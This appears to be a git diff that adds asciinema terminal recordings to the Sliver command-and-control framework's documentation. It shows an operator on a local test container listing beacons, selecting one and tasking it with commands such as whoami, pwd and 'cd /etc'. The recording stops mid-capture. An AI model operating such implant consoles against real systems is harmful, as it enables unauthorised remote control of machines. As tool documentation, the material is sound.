linux/amd64\u001b[0m\r\n\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mActive session CONTINUING_DOWNTOWN (d761c1c5-a50f-402e-9988-eacfdc3f5d76)\r\n"] +[58.081455, "o", "\r\n"] +[58.097304, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[58.098031, "o", "\u001b[1 q\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[58.098116, "o", "\u001b[6n"] +[58.100344, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[58.101043, "o", "\u001b[107D\u001b[1A\u001b[31D\u001b[31C\u001b[107D\u001b[31C\u001b[?25h"] +[59.00066, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[59.008232, "o", "w\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[59.009408, "o", "\u001b[107D\u001b[1A\u001b[32D\u001b[31C\u001b[107D\u001b[32C\u001b[?25h"] +[59.034482, "o", "\u001b[?25l\u001b[107D"] +[59.035378, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[59.038567, "o", "wh\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[59.039195, "o", "\u001b[0J\u001b[107D\u001b[1A\u001b[33D\u001b[31C\u001b[107D\u001b[33C\u001b[?25h"] +[59.081608, "o", "\u001b[?25l\u001b[107D"] +[59.081798, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[59.084025, "o", "who\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[34D\u001b[31C\u001b[107D\u001b[34C\u001b[?25h"] +[59.254427, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[59.266619, "o", "whoa\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[59.267906, "o", "\u001b[107D\u001b[1A\u001b[35D\u001b[31C\u001b[107D\u001b[35C\u001b[?25h"] +[59.325631, "o", "\u001b[?25l"] +[59.326094, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[59.331266, "o", "whoam\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[36D\u001b[31C\u001b[107D\u001b[36C\u001b[?25h"] +[59.377568, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[59.383107, "o", "\u001b[1m\u001b[32mwhoami\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[37D\u001b[31C\u001b[107D\u001b[37C\u001b[?25h"] +[59.588329, "o", "\u001b[37D\u001b[31C\u001b[6n"] +[59.597529, "o", "\u001b[107D\u001b[37C\u001b[0J\u001b[107D\r\r\n\u001b[0 q\r\n"] +[59.610221, "o", "Logon ID: "] +[59.611299, "o", "root\r\n\r\n"] +[59.629554, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[59.629747, "o", "\u001b[1 q\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[59.631833, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[31D\u001b[31C\u001b[107D\u001b[31C\u001b[?25h"] +[61.017297, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[61.026385, "o", "b\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[61.02663, "o", "\u001b[107D\u001b[1A\u001b[32D\u001b[31C\u001b[107D\u001b[32C\u001b[?25h"] +[61.068058, "o", "\u001b[?25l"] +[61.068722, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[61.071242, "o", "ba\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[33D\u001b[31C\u001b[107D\u001b[33C\u001b[?25h"] +[61.135517, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[61.136446, "o", "\u001b[6n"] +[61.13851, "o", "bac\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[34D\u001b[31C\u001b[107D\u001b[34C\u001b[?25h"] +[61.240549, "o", "\u001b[?25l\u001b[107D"] +[61.241615, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[61.245107, "o", "back\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[35D\u001b[31C\u001b[107D\u001b[35C\u001b[?25h"] +[61.392645, "o", "\u001b[?25l\u001b[107D"] +[61.393455, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[61.3964, "o", "backg\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[61.397066, "o", "\u001b[107D\u001b[1A\u001b[36D\u001b[31C\u001b[107D\u001b[36C\u001b[?25h"] +[61.446084, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[61.453962, "o", "backgr\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[37D\u001b[31C\u001b[107D\u001b[37C\u001b[?25h"] +[61.463207, "o", "\u001b[?25l\u001b[107D"] +[61.463456, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[61.466118, "o", "backgro\u001b[0m\u001b[0K\u001b[49m"] +[61.466614, "o", "\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[38D\u001b[31C\u001b[107D\u001b[38C\u001b[?25h"] +[61.529749, "o", "\u001b[?25l"] +[61.530447, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[61.533051, "o", "backgrou\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[39D\u001b[31C\u001b[107D\u001b[39C"] +[61.533581, "o", "\u001b[?25h"] +[61.583812, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[61.584318, "o", "\u001b[6n"] +[61.587406, "o", "backgroun\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[61.58796, "o", "\u001b[107D\u001b[1A\u001b[40D\u001b[31C\u001b[107D\u001b[40C\u001b[?25h"] +[61.649163, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[61.655788, "o", "\u001b[1m\u001b[32mbackground\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[41D\u001b[31C\u001b[107D\u001b[41C\u001b[?25h"] +[61.783388, "o", "\u001b[41D\u001b[31C\u001b[6n"] +[61.78635, "o", "\u001b[107D\u001b[41C\u001b[0J\u001b[107D\r\r\n"] +[61.787211, "o", "\u001b[0 q\r\n"] +[61.810475, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mBackground ...\r\n\r\n"] +[61.821059, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[61.821285, "o", "\u001b[1 q\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[61.823176, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[9D\u001b[9C\u001b[107D\u001b[9C\u001b[?25h"] +[62.090512, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[62.101672, "o", "e\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[62.103105, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[10D\u001b[9C\u001b[107D\u001b[10C\u001b[?25h"] +[62.241817, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[62.249322, "o", "ex\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[11D\u001b[9C\u001b[107D\u001b[11C\u001b[?25h"] +[62.359108, "o", "\u001b[?25l"] +[62.36363, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[62.370148, "o", "exi\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[62.370341, "o", "\u001b[0J\u001b[107D\u001b[1A\u001b[12D\u001b[9C\u001b[107D\u001b[12C\u001b[?25h"] +[62.472172, "o", "\u001b[?25l"] +[62.474138, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[62.481703, "o", "\u001b[1m\u001b[32mexit\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[62.483223, "o", "\u001b[0J\u001b[107D\u001b[1A\u001b[13D\u001b[9C\u001b[107D\u001b[13C\u001b[?25h"] +[62.559049, "o", "\u001b[13D\u001b[9C"] +[62.559802, "o", "\u001b[6n"] +[62.561967, "o", "\u001b[107D\u001b[13C\u001b[0J\u001b[107D\r\r\n"] +[62.563209, "o", "\u001b[0 q\r\n"] +[62.575201, "o", "Exiting...\r\n"] +[62.590297, "o", "\u001b[?2004hroot@98df0494f659:~# "] +[63.849189, "o", "e"] +[64.004011, "o", "x"] +[64.092826, "o", "i"] +[64.22418, "o", "t"] +[64.365779, "o", "\r\n"] +[64.376672, "o", "\u001b[?2004l\rexit\r\n"] diff --git a/docs/sliver-docs/public/asciinema/beacon_tasks.cast b/docs/sliver-docs/public/asciinema/beacon_tasks.cast new file mode 100644 index 0000000000..d7e20219b4 --- /dev/null +++ b/docs/sliver-docs/public/asciinema/beacon_tasks.cast @@ -0,0 +1,438 @@ +{"version": 2, "width": 107, "height": 52, "timestamp": 1714589964, "env": {"SHELL": "/bin/bash", "TERM": "screen"}} +[0.140524, "o", "\u001b[?2004h"] +[0.148443, "o", "root@98df0494f659:~# "] +[1.092972, "o", "."] +[1.102658, "o", "/"] +[1.244956, "o", "s"] +[1.384103, "o", "l"] +[1.451221, "o", "i"] +[1.566295, "o", "v"] +[1.65714, "o", "e"] +[1.781979, "o", "r"] +[1.875798, "o", "-"] +[2.012557, "o", "s"] +[2.054748, "o", "e"] +[2.12507, "o", "r"] +[2.314928, "o", "v"] +[2.433486, "o", "e"] +[2.51908, "o", "r"] +[2.592513, "o", "\r\n"] +[2.593653, "o", "\u001b[?2004l\r"] +[3.68766, "o", "\u001b[1m\u001b[37m\r\r\n.------..------..------..------..------..------.\r\r\n|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |\r\r\n| :/\\: || :/\\: || (\\/) || :(): || (\\/) || :(): |\r\r\n| :\\/: || (__) || :\\/: || ()() || :\\/: || ()() |\r\r\n| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|\r\r\n`------'`------'`------'`------'`------'`------'\r\r\n\u001b[0m\r\nAll hackers gain infect\r\r\n\u001b[1m\u001b[36m[*] \u001b[0mServer v1.5.39 - 0b235b4d42d4eb75684825f5d5b30da71ec57d26 - \u001b[1mDirty\u001b[0m\r\r\n\u001b[1m\u001b[36m[*] \u001b[0mWelcome to the sliver shell, please type 'help' for options\r\r\n"] +[3.691324, "o", "\r\n"] +[3.71693, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[3.719317, "o", "\u001b[1 q"] +[3.720852, "o", "\u001b[?25l"] +[3.720936, "o", "\u001b[107D"] +[3.721661, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[3.723556, "o", "\u001b[0m\u001b[0K\u001b[49m"] +[3.724116, "o", "\r\r\n"] +[3.724702, "o", "\u001b[0K"] +[3.725093, "o", "\u001b[0J\u001b[107D\u001b[1A\u001b[9D\u001b[9C\u001b[107D\u001b[9C\u001b[?25h"] +[5.058535, "o", "\u001b[9D\u001b[9C"] +[5.058773, "o", "\u001b[107D\u001b[0J\r\u001b[2K\r\r\n\u001b[1m\u001b[36m[*] \u001b[0mBeacon 1c2fd3e4 CONTINUING_DOWNTOWN - 127.0.0.1:60476 (98df0494f659) - linux/amd64 - Wed, 01 May 2024 18:59:29 UTC\r\r\n\r\n\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[5.061131, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[9D"] +[5.061739, "o", "\u001b[9C\u001b[107D\u001b[9C\u001b[?25h"] +[6.880052, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[6.892592, "o", "u\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A"] +[6.894748, "o", "\u001b[10D\u001b[9C\u001b[107D\u001b[10C\u001b[?25h"] +[6.986727, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[6.994765, "o", "us\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[11D\u001b[9C\u001b[107D\u001b[11C\u001b[?25h"] +[7.089687, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[7.092, "o", "\u001b[6n"] +[7.101323, "o", "\u001b[1m\u001b[32muse\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[12D\u001b[9C\u001b[107D\u001b[12C\u001b[?25h"] +[7.222552, "o", "\u001b[?25l"] +[7.22397, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[7.231476, "o", "\u001b[1m\u001b[32muse \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[7.232508, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[13D\u001b[9C\u001b[107D\u001b[13C\u001b[?25h"] +[7.702976, "o", "\u001b[13D\u001b[9C"] +[7.704889, "o", "\u001b[6n"] +[7.70799, "o", "\u001b[107D"] +[7.708825, "o", "\u001b[13C\u001b[0J\u001b[107D\r\r\n"] +[7.71392, "o", "\u001b[0 q"] +[7.715073, "o", "\r\n"] +[7.754419, "o", "\u001b7\u001b[?25l"] +[7.755692, "o", "\u001b8\u001b[0G\u001b[2K"] +[7.767926, "o", "\u001b[0;1;92m? \u001b[0m\u001b[0;1;99mSelect a session or beacon:\u001b[0m \u001b[0;36m[Use arrows to move, type to filter]\u001b[0m\r\n\u001b[0;1;36m> BEACON 1c2fd3e4 CONTINUING_DOWNTOWN 127.0.0.1:60476 98df0494f659 root linux/amd64\u001b[0m\r\n\u001b[0;39m BEACON 336eb77f CONTINUING_DOWNTOWN 127.0.0.1:60442 98df0494f659 root linux/amd64\u001b[0m\r\n\u001b[0;39m BEACON dd8121c1 CONTINUING_DOWNTOWN 127.0.0.1:60460 98df0494f659 root linux/amd64\u001b[0m\r\n\u001b7"] +[7.771409, "o", "\u001b[1A\u001b[0G\u001b[1A\u001b[0G"] +[7.771878, "o", "\u001b[1A\u001b[0G"] +[11.070565, "o", "\u001b8\u001b[?25h\u001b8\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K"] +[11.071419, "o", "\u001b[0;1;92m? \u001b[0m\u001b[0;1;99mSelect a session or beacon:\u001b[0m\u001b[0;36m BEACON 1c2fd3e4 CONTINUING_DOWNTOWN 127.0.0.1:60476 98df0494f659 root linux/amd64\u001b[0m\r\n"] +[11.079814, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mActive beacon CONTINUING_DOWNTOWN (1c2fd3e4-045b-445c-9cbc-7c955a42710c)\r\n"] +[11.130002, "o", "\r\n"] +[11.141528, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[11.141978, "o", "\u001b[1 q\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[11.143698, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[31D\u001b[31C\u001b[107D\u001b[31C\u001b[?25h"] +[12.218211, "o", "\u001b[H\u001b[2J\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[?25l"] +[12.218731, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[12.224874, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[12.22569, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[31D\u001b[31C\u001b[107D\u001b[31C\u001b[?25h"] +[13.32985, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[13.345968, "o", "t\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A"] +[13.347979, "o", "\u001b[32D\u001b[31C\u001b[107D\u001b[32C\u001b[?25h"] +[13.488396, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[13.489622, "o", "\u001b[6n"] +[13.493719, "o", "ta\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[33D\u001b[31C\u001b[107D\u001b[33C\u001b[?25h"] +[13.580168, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[13.580976, "o", "\u001b[6n"] +[13.59193, "o", "tas\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A"] +[13.593041, "o", "\u001b[34D\u001b[31C\u001b[107D\u001b[34C\u001b[?25h"] +[13.755221, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[13.757586, "o", "\u001b[6n"] +[13.767033, "o", "task\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[35D\u001b[31C\u001b[107D\u001b[35C\u001b[?25h"] +[13.797975, "o", "\u001b[?25l"] +[13.798407, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[13.801808, "o", "\u001b[1m\u001b[32mtasks\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[36D\u001b[31C\u001b[107D\u001b[36C\u001b[?25h"] +[14.330079, "o", "\u001b[36D\u001b[31C\u001b[6n"] +[14.339172, "o", "\u001b[107D\u001b[36C\u001b[0J\u001b[107D\r\r\n"] +[14.339882, "o", "\u001b[0 q\r\n"] +[14.374826, "o", " ID State Message Type Created Sent Completed \r\n==== ======= ============== ========= ====== ===========\r\n"] +[14.37569, "o", "\r\n\r\n"] +[14.389895, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[14.390054, "o", "\u001b[1 q"] +[14.391627, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[14.393573, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D"] +[14.394075, "o", "\u001b[1A\u001b[31D\u001b[31C\u001b[107D\u001b[31C\u001b[?25h"] +[15.74266, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[15.752601, "o", "\u001b[6n"] +[15.756241, "o", "p\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[15.75659, "o", "\u001b[107D\u001b[1A\u001b[32D\u001b[31C\u001b[107D\u001b[32C\u001b[?25h"] +[16.027773, "o", "\u001b[?25l\u001b[107D"] +[16.030576, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[16.037738, "o", "pw\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[33D\u001b[31C\u001b[107D\u001b[33C\u001b[?25h"] +[16.107478, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[16.111582, "o", "\u001b[1m\u001b[32mpwd\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[34D\u001b[31C\u001b[107D\u001b[34C\u001b[?25h"] +[16.219819, "o", "\u001b[34D\u001b[31C"] +[16.220708, "o", "\u001b[6n"] +[16.225655, "o", "\u001b[107D\u001b[34C\u001b[0J\u001b[107D\r\r\n\u001b[0 q\r\n"] +[16.247539, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mTasked beacon CONTINUING_DOWNTOWN (3b339091)\r\n"] +[16.248147, "o", "\r\n"] +[16.262404, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[16.262572, "o", "\u001b[1 q\u001b[?25l\u001b[107D"] +[16.263191, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[16.265419, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[31D\u001b[31C\u001b[107D\u001b[31C\u001b[?25h"] +[17.822584, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[17.833168, "o", "c\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[32D\u001b[31C\u001b[107D\u001b[32C\u001b[?25h"] +[17.885083, "o", "\u001b[?25l"] +[17.886723, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[17.890018, "o", "\u001b[1m\u001b[32mcd\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[17.890688, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[33D\u001b[31C\u001b[107D\u001b[33C\u001b[?25h"] +[17.965664, "o", "\u001b[?25l"] +[17.966478, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[17.96914, "o", "\u001b[1m\u001b[32mcd \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[34D\u001b[31C\u001b[107D\u001b[34C"] +[17.969649, "o", "\u001b[?25h"] +[18.307966, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[18.318102, "o", "\u001b[1m\u001b[32mcd \u001b[39m\u001b[22m/\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[18.319213, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[35D\u001b[31C\u001b[107D\u001b[35C\u001b[?25h"] +[18.428329, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[18.433563, "o", "\u001b[1m\u001b[32mcd \u001b[39m\u001b[22m/e\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D"] +[18.434378, "o", "\u001b[1A\u001b[36D\u001b[31C\u001b[107D\u001b[36C\u001b[?25h"] +[18.530772, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[18.540775, "o", "\u001b[1m\u001b[32mcd \u001b[39m\u001b[22m/et\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[18.54121, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[37D\u001b[31C\u001b[107D\u001b[37C\u001b[?25h"] +[18.793708, "o", "\u001b[?25l"] +[18.795666, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[18.801623, "o", "\u001b[1m\u001b[32mcd \u001b[39m\u001b[22m/etc\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[38D\u001b[31C\u001b[107D\u001b[38C\u001b[?25h"] +[19.801765, "o", "\u001b[38D\u001b[31C\u001b[6n"] +[19.817067, "o", "\u001b[107D\u001b[38C\u001b[0J\u001b[107D\r\r\n\u001b[0 q\r\n"] +[19.846176, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mTasked beacon CONTINUING_DOWNTOWN (415074fa)\r\n"] +[19.847431, "o", "\r\n"] +[19.85978, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[19.860582, "o", "\u001b[1 q\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[19.862153, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D"] +[19.862699, "o", "\u001b[1A\u001b[31D\u001b[31C\u001b[107D\u001b[31C\u001b[?25h"] +[20.855063, "o", "\u001b[?25l"] +[20.858059, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[20.858829, "o", "\u001b[6n"] +[20.863938, "o", "l\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[32D\u001b[31C\u001b[107D"] +[20.865159, "o", 